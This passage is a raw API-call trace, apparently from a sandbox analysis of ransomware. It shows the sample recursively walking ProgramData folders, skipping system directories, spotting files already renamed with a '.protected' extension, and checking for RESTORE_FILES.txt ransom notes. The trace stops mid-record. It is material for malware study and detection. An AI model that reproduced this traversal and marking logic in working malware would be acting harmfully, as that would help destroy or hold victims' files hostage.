[0093.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.281] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.281] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") 
returned 1 [0093.281] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\..") returned 74 [0093.281] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="Program Files") returned -1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="Program Files (x86)") returned -1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="$Recycle.bin") returned 1 [0093.281] lstrcmpiW (lpString1="History.Log.protected", lpString2="System Volume Information") returned -1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.protected") returned 93 [0093.281] StrStrIW (lpFirst="History.Log.protected", lpSrch=".protected") returned=".protected" [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.281] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt") returned 89 [0093.281] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.281] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="Windows") returned -1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="Program Files") returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="Program Files (x86)") returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="$Recycle.bin") returned 1 [0093.281] lstrcmpiW (lpString1="Unknown.Log.protected", lpString2="System Volume Information") returned 1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.protected") returned 93 [0093.281] StrStrIW (lpFirst="Unknown.Log.protected", lpSrch=".protected") returned=".protected" [0093.281] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.281] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt") returned 89 [0093.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.282] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="Program Files") returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="Program Files (x86)") returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1="Store", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 69 [0093.282] lstrcmpW (lpString1="Store", lpString2=".") returned 1 [0093.282] lstrcmpW (lpString1="Store", lpString2="..") returned 1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*") returned 71 [0093.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.282] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.282] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.282] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\.") returned 71 [0093.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.282] FindNextFileW (in: hFindFile=0x47ba90, 
lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\..") returned 72 [0093.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.282] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.282] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt") returned 87 [0093.282] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.282] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.282] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.282] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.283] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt") returned 87 [0093.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\store\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.283] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.283] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.283] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt") returned 81 [0093.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.283] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.283] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.283] wnsprintfW (in: pszDest=0x4bfb20, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt") returned 73 [0093.283] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.283] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.283] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.283] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt") returned 73 [0093.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.284] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="Windows") returned -1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="Program Files") returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="Program Files (x86)") returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="$Recycle.bin") returned 1 [0093.284] lstrcmpiW (lpString1="Support", lpString2="System Volume Information") returned -1 [0093.284] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned 57 [0093.284] lstrcmpW (lpString1="Support", lpString2=".") returned 1 [0093.284] lstrcmpW (lpString1="Support", lpString2="..") returned 1 [0093.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*") returned 59 [0093.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.284] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.284] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\.") returned 59 [0093.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.284] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.285] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.285] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.285] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.285] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.285] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\..") returned 60 [0093.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="Windows") returned -1 [0093.285] lstrcmpiW 
(lpString1="MPLog-07132009-221054.log.protected", lpString2="Program Files") returned -1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="Program Files (x86)") returned -1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="$Recycle.bin") returned 1 [0093.285] lstrcmpiW (lpString1="MPLog-07132009-221054.log.protected", lpString2="System Volume Information") returned -1 [0093.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.protected") returned 93 [0093.285] StrStrIW (lpFirst="MPLog-07132009-221054.log.protected", lpSrch=".protected") returned=".protected" [0093.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.285] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt") returned 75 [0093.285] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.285] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.285] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.286] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt") returned 75 [0093.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.286] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.286] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.286] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\RESTORE_FILES.txt") returned 67 [0093.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.287] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="Windows") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files (x86)") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="$Recycle.bin") returned 1 [0093.287] lstrcmpiW (lpString1="Windows NT", lpString2="System Volume Information") returned 1 [0093.287] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned 43 [0093.287] lstrcmpW (lpString1="Windows NT", 
lpString2=".") returned 1 [0093.287] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0093.287] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*") returned 45 [0093.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.287] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.287] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.287] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.287] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.287] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.287] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\.") returned 45 [0093.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.287] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.287] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.287] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.288] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.288] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.288] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.288] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\..") returned 46 [0093.288] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.288] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.288] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.288] lstrcmpiW 
(lpString1="MSFax", lpString2="Windows") returned -1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="Program Files") returned -1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="Program Files (x86)") returned -1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="$Recycle.bin") returned 1 [0093.288] lstrcmpiW (lpString1="MSFax", lpString2="System Volume Information") returned -1 [0093.288] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned 49 [0093.288] lstrcmpW (lpString1="MSFax", lpString2=".") returned 1 [0093.288] lstrcmpW (lpString1="MSFax", lpString2="..") returned 1 [0093.288] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*") returned 51 [0093.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.288] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.288] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.288] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.288] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.288] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.288] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\.") returned 51 [0093.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.289] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.289] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.289] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.289] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned 
-1 [0093.289] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.289] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.289] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\..") returned 52 [0093.289] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.289] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="Windows") returned -1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files") returned -1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files (x86)") returned -1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="$Recycle.bin") returned 1 [0093.289] lstrcmpiW (lpString1="ActivityLog", lpString2="System Volume Information") returned -1 [0093.289] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 61 [0093.289] lstrcmpW (lpString1="ActivityLog", lpString2=".") returned 1 [0093.289] lstrcmpW (lpString1="ActivityLog", lpString2="..") returned 1 [0093.289] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned 63 [0093.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.289] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.289] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.289] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.289] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0093.289] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.289] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\.") returned 63 [0093.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.289] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.290] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.290] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.290] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\..") returned 64 [0093.290] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.290] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.290] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt") returned 79 [0093.290] StrStrIW 
(lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.290] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.290] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.290] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt") returned 79 [0093.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\activitylog\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.290] FindNextFileW (in: hFindFile=0x47ba10, 